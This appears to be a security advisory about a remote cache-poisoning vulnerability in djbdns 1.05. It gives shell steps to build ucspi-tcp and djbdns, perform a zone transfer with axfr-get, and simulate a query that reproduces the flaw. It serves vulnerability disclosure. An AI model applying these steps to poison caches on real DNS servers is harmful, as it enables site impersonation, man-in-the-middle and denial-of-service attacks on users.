30 lines
No EOL
1.2 KiB
Text
30 lines
No EOL
1.2 KiB
Text
source: https://www.securityfocus.com/bid/33937/info
|
|
|
|
The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
|
|
|
|
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
|
|
|
|
This issue affects djbdns 1.05; other versions may also be vulnerable.
|
|
|
|
# Download and build ucspi-tcp-0.88.
|
|
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
|
|
$ tar -zxf ucspi-tcp-0.88.tar.gz
|
|
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
|
|
$ make -C ucspi-tcp-0.88
|
|
|
|
# Download and build djbdns-1.05.
|
|
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
|
|
$ tar -zxf djbdns-1.05.tar.gz
|
|
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
|
|
$ make -C djbdns-1.05
|
|
|
|
# Use tcpclient and axfr-get to do a zone transfer for
|
|
# www.example.com from www.example2.com.
|
|
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
|
|
|
|
# Use tinydns-data to compile data into data.cdb.
|
|
$ ./djbdns-1.05/tinydns-data
|
|
|
|
# Simulate an A query for www.example.com using the data
|
|
# from the zone transfer.
|
|
$ ./djbdns-1.05/tinydns-get a www.example.com |